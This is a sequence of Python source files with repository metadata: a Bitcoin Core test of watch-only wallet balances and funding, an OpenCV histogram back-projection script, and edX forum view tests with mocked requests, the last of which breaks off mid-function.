# Copyright (c) 2018-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test createwallet arguments.
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error
)
class CreateWalletWatchonlyTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = False
self.num_nodes = 1
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
node = self.nodes[0]
self.nodes[0].createwallet(wallet_name='default')
def_wallet = node.get_wallet_rpc('default')
a1 = def_wallet.getnewaddress()
wo_change = def_wallet.getnewaddress()
wo_addr = def_wallet.getnewaddress()
self.nodes[0].createwallet(wallet_name='wo', disable_private_keys=True)
wo_wallet = node.get_wallet_rpc('wo')
wo_wallet.importpubkey(pubkey=def_wallet.getaddressinfo(wo_addr)['pubkey'])
wo_wallet.importpubkey(pubkey=def_wallet.getaddressinfo(wo_change)['pubkey'])
# generate some btc for testing
node.generatetoaddress(101, a1)
# send 1 btc to our watch-only address
txid = def_wallet.sendtoaddress(wo_addr, 1)
self.nodes[0].generate(1)
# getbalance
self.log.info('include_watchonly should default to true for watch-only wallets')
self.log.info('Testing getbalance watch-only defaults')
assert_equal(wo_wallet.getbalance(), 1)
assert_equal(len(wo_wallet.listtransactions()), 1)
assert_equal(wo_wallet.getbalance(include_watchonly=False), 0)
self.log.info('Testing listreceivedbyaddress watch-only defaults')
result = wo_wallet.listreceivedbyaddress()
assert_equal(len(result), 1)
assert_equal(result[0]["involvesWatchonly"], True)
result = wo_wallet.listreceivedbyaddress(include_watchonly=False)
assert_equal(len(result), 0)
self.log.info('Testing listreceivedbylabel watch-only defaults')
result = wo_wallet.listreceivedbylabel()
assert_equal(len(result), 1)
assert_equal(result[0]["involvesWatchonly"], True)
result = wo_wallet.listreceivedbylabel(include_watchonly=False)
assert_equal(len(result), 0)
self.log.info('Testing listtransactions watch-only defaults')
result = wo_wallet.listtransactions()
assert_equal(len(result), 1)
assert_equal(result[0]["involvesWatchonly"], True)
result = wo_wallet.listtransactions(include_watchonly=False)
assert_equal(len(result), 0)
self.log.info('Testing listsinceblock watch-only defaults')
result = wo_wallet.listsinceblock()
assert_equal(len(result["transactions"]), 1)
assert_equal(result["transactions"][0]["involvesWatchonly"], True)
result = wo_wallet.listsinceblock(include_watchonly=False)
assert_equal(len(result["transactions"]), 0)
self.log.info('Testing gettransaction watch-only defaults')
result = wo_wallet.gettransaction(txid)
assert_equal(result["details"][0]["involvesWatchonly"], True)
result = wo_wallet.gettransaction(txid=txid, include_watchonly=False)
assert_equal(len(result["details"]), 0)
self.log.info('Testing walletcreatefundedpsbt watch-only defaults')
inputs = []
outputs = [{a1: 0.5}]
options = {'changeAddress': wo_change}
no_wo_options = {'changeAddress': wo_change, 'includeWatching': False}
result = wo_wallet.walletcreatefundedpsbt(inputs=inputs, outputs=outputs, options=options)
assert_equal("psbt" in result, True)
assert_raises_rpc_error(-4, "Insufficient funds", wo_wallet.walletcreatefundedpsbt, inputs, outputs, 0, no_wo_options)
self.log.info('Testing fundrawtransaction watch-only defaults')
rawtx = wo_wallet.createrawtransaction(inputs=inputs, outputs=outputs)
result = wo_wallet.fundrawtransaction(hexstring=rawtx, options=options)
assert_equal("hex" in result, True)
assert_raises_rpc_error(-4, "Insufficient funds", wo_wallet.fundrawtransaction, rawtx, no_wo_options)
if __name__ == '__main__':
CreateWalletWatchonlyTest().main()
| mit | -5,429,415,796,840,428,000 | 40.754717 | 126 | 0.678943 | false |
neilhan/python_cv_learning | 10-back_projection/run_me.py | 1 | 1472 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Testing split image? I don't remember what I was doing this for. """
from __future__ import absolute_import, division, \
print_function, unicode_literals
import sys
import cv2
cv2.namedWindow('WorkAroundTheCoreDump')
cv2.destroyWindow('WorkAroundTheCoreDump')
import numpy as np
import matplotlib.pyplot as plt
import ava.utl
import ava.cv.utl
def getHistogram(image):
# how many image, channels, mask, result, ?D histogram,
# number of bins, pixel value range
hist = cv2.calcHist([image], [0], None, [256], [0, 256])
return hist
@ava.utl.time_this
def main(argv=None):
hsv_map = np.zeros((180, 256, 3), np.uint8)
h, s = np.indices(hsv_map.shape[:2])
hsv_map[:, :, 0] = h
hsv_map[:, :, 1] = s
hsv_map[:, :, 2] = 255
hsv_map = cv2.cvtColor(hsv_map, cv2.COLOR_HLS2BGR)
if argv == None:
argv = sys.argv
image1 = cv2.imread("../images/pic3.jpg", 1)
print(type(image1))
print("image.shape:", image1.shape)
print('image:', image1)
print('image dtype:', image1.dtype)
# split image
imageHsv = cv2.cvtColor(image1, cv2.COLOR_BGR2HSV)
hist = cv2.calcHist( [imageHsv], [0, 1], None, [180, 256], [0, 180, 0, 256] )
hist2 = np.clip(hist * 0.005 * 100, 0, 1)
vis = hsv_map * hist2[:, :, np.newaxis] / 255.0
cv2.imshow('image1', image1)
cv2.imshow('hist', vis)
cv2.waitKey()
if __name__ == "__main__":
main()
| bsd-3-clause | 5,574,213,392,175,967,000 | 24.37931 | 81 | 0.617527 | false |
jelugbo/tundex | lms/djangoapps/django_comment_client/base/tests.py | 6 | 41997 | import logging
import json
from django.test.client import Client, RequestFactory
from django.test.utils import override_settings
from django.contrib.auth.models import User
from django.core.management import call_command
from django.core.urlresolvers import reverse
from mock import patch, ANY, Mock
from nose.tools import assert_true, assert_equal # pylint: disable=E0611
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from courseware.tests.modulestore_config import TEST_DATA_MIXED_MODULESTORE
from django_comment_client.base import views
from django_comment_client.tests.group_id import CohortedTopicGroupIdTestMixin, NonCohortedTopicGroupIdTestMixin, GroupIdAssertionMixin
from django_comment_client.tests.utils import CohortedContentTestCase
from django_comment_client.tests.unicode import UnicodeTestMixin
from django_comment_common.models import Role
from django_comment_common.utils import seed_permissions_roles
from student.tests.factories import CourseEnrollmentFactory, UserFactory
from util.testing import UrlResetMixin
from xmodule.modulestore.tests.factories import CourseFactory
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
log = logging.getLogger(__name__)
CS_PREFIX = "http://localhost:4567/api/v1"
class MockRequestSetupMixin(object):
def _create_response_mock(self, data):
return Mock(text=json.dumps(data), json=Mock(return_value=data))
def _set_mock_request_data(self, mock_request, data):
mock_request.return_value = self._create_response_mock(data)
@patch('lms.lib.comment_client.utils.requests.request')
class CreateThreadGroupIdTestCase(
MockRequestSetupMixin,
CohortedContentTestCase,
CohortedTopicGroupIdTestMixin,
NonCohortedTopicGroupIdTestMixin
):
cs_endpoint = "/threads"
def call_view(self, mock_request, commentable_id, user, group_id, pass_group_id=True):
self._set_mock_request_data(mock_request, {})
mock_request.return_value.status_code = 200
request_data = {"body": "body", "title": "title", "thread_type": "discussion"}
if pass_group_id:
request_data["group_id"] = group_id
request = RequestFactory().post("dummy_url", request_data)
request.user = user
request.view_name = "create_thread"
return views.create_thread(
request,
course_id=self.course.id.to_deprecated_string(),
commentable_id=commentable_id
)
def test_group_info_in_response(self, mock_request):
response = self.call_view(
mock_request,
"cohorted_topic",
self.student,
None
)
self._assert_json_response_contains_group_info(response)
@patch('lms.lib.comment_client.utils.requests.request')
class ThreadActionGroupIdTestCase(
MockRequestSetupMixin,
CohortedContentTestCase,
GroupIdAssertionMixin
):
def call_view(
self,
view_name,
mock_request,
user=None,
post_params=None,
view_args=None
):
self._set_mock_request_data(
mock_request,
{
"user_id": str(self.student.id),
"group_id": self.student_cohort.id,
"closed": False,
"type": "thread"
}
)
mock_request.return_value.status_code = 200
request = RequestFactory().post("dummy_url", post_params or {})
request.user = user or self.student
request.view_name = view_name
return getattr(views, view_name)(
request,
course_id=self.course.id.to_deprecated_string(),
thread_id="dummy",
**(view_args or {})
)
def test_update(self, mock_request):
response = self.call_view(
"update_thread",
mock_request,
post_params={"body": "body", "title": "title"}
)
self._assert_json_response_contains_group_info(response)
def test_delete(self, mock_request):
response = self.call_view("delete_thread", mock_request)
self._assert_json_response_contains_group_info(response)
def test_vote(self, mock_request):
response = self.call_view(
"vote_for_thread",
mock_request,
view_args={"value": "up"}
)
self._assert_json_response_contains_group_info(response)
response = self.call_view("undo_vote_for_thread", mock_request)
self._assert_json_response_contains_group_info(response)
def test_flag(self, mock_request):
response = self.call_view("flag_abuse_for_thread", mock_request)
self._assert_json_response_contains_group_info(response)
response = self.call_view("un_flag_abuse_for_thread", mock_request)
self._assert_json_response_contains_group_info(response)
def test_pin(self, mock_request):
response = self.call_view(
"pin_thread",
mock_request,
user=self.moderator
)
self._assert_json_response_contains_group_info(response)
response = self.call_view(
"un_pin_thread",
mock_request,
user=self.moderator
)
self._assert_json_response_contains_group_info(response)
def test_openclose(self, mock_request):
response = self.call_view(
"openclose_thread",
mock_request,
user=self.moderator
)
self._assert_json_response_contains_group_info(
response,
lambda d: d['content']
)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
@patch('lms.lib.comment_client.utils.requests.request')
class ViewsTestCase(UrlResetMixin, ModuleStoreTestCase, MockRequestSetupMixin):
@patch.dict("django.conf.settings.FEATURES", {"ENABLE_DISCUSSION_SERVICE": True})
def setUp(self):
# Patching the ENABLE_DISCUSSION_SERVICE value affects the contents of urls.py,
# so we need to call super.setUp() which reloads urls.py (because
# of the UrlResetMixin)
super(ViewsTestCase, self).setUp(create_user=False)
# create a course
self.course = CourseFactory.create(
org='MITx', course='999',
discussion_topics={"Some Topic": {"id": "some_topic"}},
display_name='Robot Super Course',
)
self.course_id = self.course.id
# seed the forums permissions and roles
call_command('seed_permissions_roles', self.course_id.to_deprecated_string())
# Patch the comment client user save method so it does not try
# to create a new cc user when creating a django user
with patch('student.models.cc.User.save'):
uname = 'student'
email = '[email protected]'
password = 'test'
# Create the user and make them active so we can log them in.
self.student = User.objects.create_user(uname, email, password)
self.student.is_active = True
self.student.save()
# Enroll the student in the course
CourseEnrollmentFactory(user=self.student,
course_id=self.course_id)
self.client = Client()
assert_true(self.client.login(username='student', password='test'))
def test_create_thread(self, mock_request):
mock_request.return_value.status_code = 200
self._set_mock_request_data(mock_request, {
"thread_type": "discussion",
"title": "Hello",
"body": "this is a post",
"course_id": "MITx/999/Robot_Super_Course",
"anonymous": False,
"anonymous_to_peers": False,
"commentable_id": "i4x-MITx-999-course-Robot_Super_Course",
"created_at": "2013-05-10T18:53:43Z",
"updated_at": "2013-05-10T18:53:43Z",
"at_position_list": [],
"closed": False,
"id": "518d4237b023791dca00000d",
"user_id": "1",
"username": "robot",
"votes": {
"count": 0,
"up_count": 0,
"down_count": 0,
"point": 0
},
"abuse_flaggers": [],
"type": "thread",
"group_id": None,
"pinned": False,
"endorsed": False,
"unread_comments_count": 0,
"read": False,
"comments_count": 0,
})
thread = {
"thread_type": "discussion",
"body": ["this is a post"],
"anonymous_to_peers": ["false"],
"auto_subscribe": ["false"],
"anonymous": ["false"],
"title": ["Hello"],
}
url = reverse('create_thread', kwargs={'commentable_id': 'i4x-MITx-999-course-Robot_Super_Course',
'course_id': self.course_id.to_deprecated_string()})
response = self.client.post(url, data=thread)
assert_true(mock_request.called)
mock_request.assert_called_with(
'post',
'{prefix}/i4x-MITx-999-course-Robot_Super_Course/threads'.format(prefix=CS_PREFIX),
data={
'thread_type': 'discussion',
'body': u'this is a post',
'anonymous_to_peers': False, 'user_id': 1,
'title': u'Hello',
'commentable_id': u'i4x-MITx-999-course-Robot_Super_Course',
'anonymous': False,
'course_id': u'MITx/999/Robot_Super_Course',
},
params={'request_id': ANY},
headers=ANY,
timeout=5
)
assert_equal(response.status_code, 200)
def test_delete_comment(self, mock_request):
self._set_mock_request_data(mock_request, {
"user_id": str(self.student.id),
"closed": False,
})
test_comment_id = "test_comment_id"
request = RequestFactory().post("dummy_url", {"id": test_comment_id})
request.user = self.student
request.view_name = "delete_comment"
response = views.delete_comment(request, course_id=self.course.id.to_deprecated_string(), comment_id=test_comment_id)
self.assertEqual(response.status_code, 200)
self.assertTrue(mock_request.called)
args = mock_request.call_args[0]
self.assertEqual(args[0], "delete")
self.assertTrue(args[1].endswith("/{}".format(test_comment_id)))
def _setup_mock_request(self, mock_request, include_depth=False):
"""
Ensure that mock_request returns the data necessary to make views
function correctly
"""
mock_request.return_value.status_code = 200
data = {
"user_id": str(self.student.id),
"closed": False,
}
if include_depth:
data["depth"] = 0
self._set_mock_request_data(mock_request, data)
def _test_request_error(self, view_name, view_kwargs, data, mock_request):
"""
Submit a request against the given view with the given data and ensure
that the result is a 400 error and that no data was posted using
mock_request
"""
self._setup_mock_request(mock_request, include_depth=(view_name == "create_sub_comment"))
response = self.client.post(reverse(view_name, kwargs=view_kwargs), data=data)
self.assertEqual(response.status_code, 400)
for call in mock_request.call_args_list:
self.assertEqual(call[0][0].lower(), "get")
def test_create_thread_no_title(self, mock_request):
self._test_request_error(
"create_thread",
{"commentable_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{"body": "foo"},
mock_request
)
def test_create_thread_empty_title(self, mock_request):
self._test_request_error(
"create_thread",
{"commentable_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{"body": "foo", "title": " "},
mock_request
)
def test_create_thread_no_body(self, mock_request):
self._test_request_error(
"create_thread",
{"commentable_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{"title": "foo"},
mock_request
)
def test_create_thread_empty_body(self, mock_request):
self._test_request_error(
"create_thread",
{"commentable_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{"body": " ", "title": "foo"},
mock_request
)
def test_update_thread_no_title(self, mock_request):
self._test_request_error(
"update_thread",
{"thread_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{"body": "foo"},
mock_request
)
def test_update_thread_empty_title(self, mock_request):
self._test_request_error(
"update_thread",
{"thread_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{"body": "foo", "title": " "},
mock_request
)
def test_update_thread_no_body(self, mock_request):
self._test_request_error(
"update_thread",
{"thread_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{"title": "foo"},
mock_request
)
def test_update_thread_empty_body(self, mock_request):
self._test_request_error(
"update_thread",
{"thread_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{"body": " ", "title": "foo"},
mock_request
)
def test_update_thread_course_topic(self, mock_request):
self._setup_mock_request(mock_request)
response = self.client.post(
reverse("update_thread", kwargs={"thread_id": "dummy", "course_id": self.course_id.to_deprecated_string()}),
data={"body": "foo", "title": "foo", "commentable_id": "some_topic"}
)
self.assertEqual(response.status_code, 200)
@patch('django_comment_client.base.views.get_discussion_categories_ids', return_value=["test_commentable"])
def test_update_thread_wrong_commentable_id(self, mock_get_discussion_id_map, mock_request):
self._test_request_error(
"update_thread",
{"thread_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{"body": "foo", "title": "foo", "commentable_id": "wrong_commentable"},
mock_request
)
def test_create_comment_no_body(self, mock_request):
self._test_request_error(
"create_comment",
{"thread_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{},
mock_request
)
def test_create_comment_empty_body(self, mock_request):
self._test_request_error(
"create_comment",
{"thread_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{"body": " "},
mock_request
)
def test_create_sub_comment_no_body(self, mock_request):
self._test_request_error(
"create_sub_comment",
{"comment_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{},
mock_request
)
def test_create_sub_comment_empty_body(self, mock_request):
self._test_request_error(
"create_sub_comment",
{"comment_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{"body": " "},
mock_request
)
def test_update_comment_no_body(self, mock_request):
self._test_request_error(
"update_comment",
{"comment_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{},
mock_request
)
def test_update_comment_empty_body(self, mock_request):
self._test_request_error(
"update_comment",
{"comment_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{"body": " "},
mock_request
)
def test_update_comment_basic(self, mock_request):
self._setup_mock_request(mock_request)
comment_id = "test_comment_id"
updated_body = "updated body"
response = self.client.post(
reverse(
"update_comment",
kwargs={"course_id": self.course_id.to_deprecated_string(), "comment_id": comment_id}
),
data={"body": updated_body}
)
self.assertEqual(response.status_code, 200)
mock_request.assert_called_with(
"put",
"{prefix}/comments/{comment_id}".format(prefix=CS_PREFIX, comment_id=comment_id),
headers=ANY,
params=ANY,
timeout=ANY,
data={"body": updated_body}
)
def test_flag_thread_open(self, mock_request):
self.flag_thread(mock_request, False)
def test_flag_thread_close(self, mock_request):
self.flag_thread(mock_request, True)
def flag_thread(self, mock_request, is_closed):
mock_request.return_value.status_code = 200
self._set_mock_request_data(mock_request, {
"title": "Hello",
"body": "this is a post",
"course_id": "MITx/999/Robot_Super_Course",
"anonymous": False,
"anonymous_to_peers": False,
"commentable_id": "i4x-MITx-999-course-Robot_Super_Course",
"created_at": "2013-05-10T18:53:43Z",
"updated_at": "2013-05-10T18:53:43Z",
"at_position_list": [],
"closed": is_closed,
"id": "518d4237b023791dca00000d",
"user_id": "1", "username": "robot",
"votes": {
"count": 0,
"up_count": 0,
"down_count": 0,
"point": 0
},
"abuse_flaggers": [1],
"type": "thread",
"group_id": None,
"pinned": False,
"endorsed": False,
"unread_comments_count": 0,
"read": False,
"comments_count": 0,
})
url = reverse('flag_abuse_for_thread', kwargs={'thread_id': '518d4237b023791dca00000d', 'course_id': self.course_id.to_deprecated_string()})
response = self.client.post(url)
assert_true(mock_request.called)
call_list = [
(
('get', '{prefix}/threads/518d4237b023791dca00000d'.format(prefix=CS_PREFIX)),
{
'data': None,
'params': {'mark_as_read': True, 'request_id': ANY},
'headers': ANY,
'timeout': 5
}
),
(
('put', '{prefix}/threads/518d4237b023791dca00000d/abuse_flag'.format(prefix=CS_PREFIX)),
{
'data': {'user_id': '1'},
'params': {'request_id': ANY},
'headers': ANY,
'timeout': 5
}
),
(
('get', '{prefix}/threads/518d4237b023791dca00000d'.format(prefix=CS_PREFIX)),
{
'data': None,
'params': {'mark_as_read': True, 'request_id': ANY},
'headers': ANY,
'timeout': 5
}
)
]
assert_equal(call_list, mock_request.call_args_list)
assert_equal(response.status_code, 200)
def test_un_flag_thread_open(self, mock_request):
self.un_flag_thread(mock_request, False)
def test_un_flag_thread_close(self, mock_request):
self.un_flag_thread(mock_request, True)
def un_flag_thread(self, mock_request, is_closed):
mock_request.return_value.status_code = 200
self._set_mock_request_data(mock_request, {
"title": "Hello",
"body": "this is a post",
"course_id": "MITx/999/Robot_Super_Course",
"anonymous": False,
"anonymous_to_peers": False,
"commentable_id": "i4x-MITx-999-course-Robot_Super_Course",
"created_at": "2013-05-10T18:53:43Z",
"updated_at": "2013-05-10T18:53:43Z",
"at_position_list": [],
"closed": is_closed,
"id": "518d4237b023791dca00000d",
"user_id": "1",
"username": "robot",
"votes": {
"count": 0,
"up_count": 0,
"down_count": 0,
"point": 0
},
"abuse_flaggers": [],
"type": "thread",
"group_id": None,
"pinned": False,
"endorsed": False,
"unread_comments_count": 0,
"read": False,
"comments_count": 0
})
url = reverse('un_flag_abuse_for_thread', kwargs={'thread_id': '518d4237b023791dca00000d', 'course_id': self.course_id.to_deprecated_string()})
response = self.client.post(url)
assert_true(mock_request.called)
call_list = [
(
('get', '{prefix}/threads/518d4237b023791dca00000d'.format(prefix=CS_PREFIX)),
{
'data': None,
'params': {'mark_as_read': True, 'request_id': ANY},
'headers': ANY,
'timeout': 5
}
),
(
('put', '{prefix}/threads/518d4237b023791dca00000d/abuse_unflag'.format(prefix=CS_PREFIX)),
{
'data': {'user_id': '1'},
'params': {'request_id': ANY},
'headers': ANY,
'timeout': 5
}
),
(
('get', '{prefix}/threads/518d4237b023791dca00000d'.format(prefix=CS_PREFIX)),
{
'data': None,
'params': {'mark_as_read': True, 'request_id': ANY},
'headers': ANY,
'timeout': 5
}
)
]
assert_equal(call_list, mock_request.call_args_list)
assert_equal(response.status_code, 200)
def test_flag_comment_open(self, mock_request):
self.flag_comment(mock_request, False)
def test_flag_comment_close(self, mock_request):
self.flag_comment(mock_request, True)
def flag_comment(self, mock_request, is_closed):
mock_request.return_value.status_code = 200
self._set_mock_request_data(mock_request, {
"body": "this is a comment",
"course_id": "MITx/999/Robot_Super_Course",
"anonymous": False,
"anonymous_to_peers": False,
"commentable_id": "i4x-MITx-999-course-Robot_Super_Course",
"created_at": "2013-05-10T18:53:43Z",
"updated_at": "2013-05-10T18:53:43Z",
"at_position_list": [],
"closed": is_closed,
"id": "518d4237b023791dca00000d",
"user_id": "1",
"username": "robot",
"votes": {
"count": 0,
"up_count": 0,
"down_count": 0,
"point": 0
},
"abuse_flaggers": [1],
"type": "comment",
"endorsed": False
})
url = reverse('flag_abuse_for_comment', kwargs={'comment_id': '518d4237b023791dca00000d', 'course_id': self.course_id.to_deprecated_string()})
response = self.client.post(url)
assert_true(mock_request.called)
call_list = [
(
('get', '{prefix}/comments/518d4237b023791dca00000d'.format(prefix=CS_PREFIX)),
{
'data': None,
'params': {'request_id': ANY},
'headers': ANY,
'timeout': 5
}
),
(
('put', '{prefix}/comments/518d4237b023791dca00000d/abuse_flag'.format(prefix=CS_PREFIX)),
{
'data': {'user_id': '1'},
'params': {'request_id': ANY},
'headers': ANY,
'timeout': 5
}
),
(
('get', '{prefix}/comments/518d4237b023791dca00000d'.format(prefix=CS_PREFIX)),
{
'data': None,
'params': {'request_id': ANY},
'headers': ANY,
'timeout': 5
}
)
]
assert_equal(call_list, mock_request.call_args_list)
assert_equal(response.status_code, 200)
def test_un_flag_comment_open(self, mock_request):
self.un_flag_comment(mock_request, False)
def test_un_flag_comment_close(self, mock_request):
self.un_flag_comment(mock_request, True)
def un_flag_comment(self, mock_request, is_closed):
mock_request.return_value.status_code = 200
self._set_mock_request_data(mock_request, {
"body": "this is a comment",
"course_id": "MITx/999/Robot_Super_Course",
"anonymous": False,
"anonymous_to_peers": False,
"commentable_id": "i4x-MITx-999-course-Robot_Super_Course",
"created_at": "2013-05-10T18:53:43Z",
"updated_at": "2013-05-10T18:53:43Z",
"at_position_list": [],
"closed": is_closed,
"id": "518d4237b023791dca00000d",
"user_id": "1",
"username": "robot",
"votes": {
"count": 0,
"up_count": 0,
"down_count": 0,
"point": 0
},
"abuse_flaggers": [],
"type": "comment",
"endorsed": False
})
url = reverse('un_flag_abuse_for_comment', kwargs={'comment_id': '518d4237b023791dca00000d', 'course_id': self.course_id.to_deprecated_string()})
response = self.client.post(url)
assert_true(mock_request.called)
call_list = [
(
('get', '{prefix}/comments/518d4237b023791dca00000d'.format(prefix=CS_PREFIX)),
{
'data': None,
'params': {'request_id': ANY},
'headers': ANY,
'timeout': 5
}
),
(
('put', '{prefix}/comments/518d4237b023791dca00000d/abuse_unflag'.format(prefix=CS_PREFIX)),
{
'data': {'user_id': '1'},
'params': {'request_id': ANY},
'headers': ANY,
'timeout': 5
}
),
(
('get', '{prefix}/comments/518d4237b023791dca00000d'.format(prefix=CS_PREFIX)),
{
'data': None,
'params': {'request_id': ANY},
'headers': ANY,
'timeout': 5
}
)
]
assert_equal(call_list, mock_request.call_args_list)
assert_equal(response.status_code, 200)
@patch("lms.lib.comment_client.utils.requests.request")
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class ViewPermissionsTestCase(UrlResetMixin, ModuleStoreTestCase, MockRequestSetupMixin):
@patch.dict("django.conf.settings.FEATURES", {"ENABLE_DISCUSSION_SERVICE": True})
def setUp(self):
super(ViewPermissionsTestCase, self).setUp()
self.password = "test password"
self.course = CourseFactory.create()
seed_permissions_roles(self.course.id)
self.student = UserFactory.create(password=self.password)
self.moderator = UserFactory.create(password=self.password)
CourseEnrollmentFactory(user=self.student, course_id=self.course.id)
CourseEnrollmentFactory(user=self.moderator, course_id=self.course.id)
self.moderator.roles.add(Role.objects.get(name="Moderator", course_id=self.course.id))
def test_pin_thread_as_student(self, mock_request):
self._set_mock_request_data(mock_request, {})
self.client.login(username=self.student.username, password=self.password)
response = self.client.post(
reverse("pin_thread", kwargs={"course_id": self.course.id.to_deprecated_string(), "thread_id": "dummy"})
)
self.assertEqual(response.status_code, 401)
def test_pin_thread_as_moderator(self, mock_request):
self._set_mock_request_data(mock_request, {})
self.client.login(username=self.moderator.username, password=self.password)
response = self.client.post(
reverse("pin_thread", kwargs={"course_id": self.course.id.to_deprecated_string(), "thread_id": "dummy"})
)
self.assertEqual(response.status_code, 200)
def test_un_pin_thread_as_student(self, mock_request):
self._set_mock_request_data(mock_request, {})
self.client.login(username=self.student.username, password=self.password)
response = self.client.post(
reverse("un_pin_thread", kwargs={"course_id": self.course.id.to_deprecated_string(), "thread_id": "dummy"})
)
self.assertEqual(response.status_code, 401)
def test_un_pin_thread_as_moderator(self, mock_request):
self._set_mock_request_data(mock_request, {})
self.client.login(username=self.moderator.username, password=self.password)
response = self.client.post(
reverse("un_pin_thread", kwargs={"course_id": self.course.id.to_deprecated_string(), "thread_id": "dummy"})
)
self.assertEqual(response.status_code, 200)
def _set_mock_request_thread_and_comment(self, mock_request, thread_data, comment_data):
def handle_request(*args, **kwargs):
url = args[1]
if "/threads/" in url:
return self._create_response_mock(thread_data)
elif "/comments/" in url:
return self._create_response_mock(comment_data)
else:
raise ArgumentError("Bad url to mock request")
mock_request.side_effect = handle_request
def test_endorse_response_as_staff(self, mock_request):
self._set_mock_request_thread_and_comment(
mock_request,
{"type": "thread", "thread_type": "question", "user_id": str(self.student.id)},
{"type": "comment", "thread_id": "dummy"}
)
self.client.login(username=self.moderator.username, password=self.password)
response = self.client.post(
reverse("endorse_comment", kwargs={"course_id": self.course.id.to_deprecated_string(), "comment_id": "dummy"})
)
self.assertEqual(response.status_code, 200)
def test_endorse_response_as_student(self, mock_request):
self._set_mock_request_thread_and_comment(
mock_request,
{"type": "thread", "thread_type": "question", "user_id": str(self.moderator.id)},
{"type": "comment", "thread_id": "dummy"}
)
self.client.login(username=self.student.username, password=self.password)
response = self.client.post(
reverse("endorse_comment", kwargs={"course_id": self.course.id.to_deprecated_string(), "comment_id": "dummy"})
)
self.assertEqual(response.status_code, 401)
def test_endorse_response_as_student_question_author(self, mock_request):
self._set_mock_request_thread_and_comment(
mock_request,
{"type": "thread", "thread_type": "question", "user_id": str(self.student.id)},
{"type": "comment", "thread_id": "dummy"}
)
self.client.login(username=self.student.username, password=self.password)
response = self.client.post(
reverse("endorse_comment", kwargs={"course_id": self.course.id.to_deprecated_string(), "comment_id": "dummy"})
)
self.assertEqual(response.status_code, 200)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class CreateThreadUnicodeTestCase(ModuleStoreTestCase, UnicodeTestMixin, MockRequestSetupMixin):
def setUp(self):
self.course = CourseFactory.create()
seed_permissions_roles(self.course.id)
self.student = UserFactory.create()
CourseEnrollmentFactory(user=self.student, course_id=self.course.id)
@patch('lms.lib.comment_client.utils.requests.request')
def _test_unicode_data(self, text, mock_request):
self._set_mock_request_data(mock_request, {})
request = RequestFactory().post("dummy_url", {"thread_type": "discussion", "body": text, "title": text})
request.user = self.student
request.view_name = "create_thread"
response = views.create_thread(request, course_id=self.course.id.to_deprecated_string(), commentable_id="test_commentable")
self.assertEqual(response.status_code, 200)
self.assertTrue(mock_request.called)
self.assertEqual(mock_request.call_args[1]["data"]["body"], text)
self.assertEqual(mock_request.call_args[1]["data"]["title"], text)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class UpdateThreadUnicodeTestCase(ModuleStoreTestCase, UnicodeTestMixin, MockRequestSetupMixin):
def setUp(self):
self.course = CourseFactory.create()
seed_permissions_roles(self.course.id)
self.student = UserFactory.create()
CourseEnrollmentFactory(user=self.student, course_id=self.course.id)
@patch('django_comment_client.base.views.get_discussion_categories_ids', return_value=["test_commentable"])
@patch('lms.lib.comment_client.utils.requests.request')
def _test_unicode_data(self, text, mock_request, mock_get_discussion_id_map):
self._set_mock_request_data(mock_request, {
"user_id": str(self.student.id),
"closed": False,
})
request = RequestFactory().post("dummy_url", {"body": text, "title": text, "thread_type": "question", "commentable_id": "test_commentable"})
request.user = self.student
request.view_name = "update_thread"
response = views.update_thread(request, course_id=self.course.id.to_deprecated_string(), thread_id="dummy_thread_id")
self.assertEqual(response.status_code, 200)
self.assertTrue(mock_request.called)
self.assertEqual(mock_request.call_args[1]["data"]["body"], text)
self.assertEqual(mock_request.call_args[1]["data"]["title"], text)
self.assertEqual(mock_request.call_args[1]["data"]["thread_type"], "question")
self.assertEqual(mock_request.call_args[1]["data"]["commentable_id"], "test_commentable")
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class CreateCommentUnicodeTestCase(ModuleStoreTestCase, UnicodeTestMixin, MockRequestSetupMixin):
def setUp(self):
self.course = CourseFactory.create()
seed_permissions_roles(self.course.id)
self.student = UserFactory.create()
CourseEnrollmentFactory(user=self.student, course_id=self.course.id)
@patch('lms.lib.comment_client.utils.requests.request')
def _test_unicode_data(self, text, mock_request):
self._set_mock_request_data(mock_request, {
"closed": False,
})
request = RequestFactory().post("dummy_url", {"body": text})
request.user = self.student
request.view_name = "create_comment"
response = views.create_comment(request, course_id=self.course.id.to_deprecated_string(), thread_id="dummy_thread_id")
self.assertEqual(response.status_code, 200)
self.assertTrue(mock_request.called)
self.assertEqual(mock_request.call_args[1]["data"]["body"], text)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class UpdateCommentUnicodeTestCase(ModuleStoreTestCase, UnicodeTestMixin, MockRequestSetupMixin):
def setUp(self):
self.course = CourseFactory.create()
seed_permissions_roles(self.course.id)
self.student = UserFactory.create()
CourseEnrollmentFactory(user=self.student, course_id=self.course.id)
@patch('lms.lib.comment_client.utils.requests.request')
def _test_unicode_data(self, text, mock_request):
self._set_mock_request_data(mock_request, {
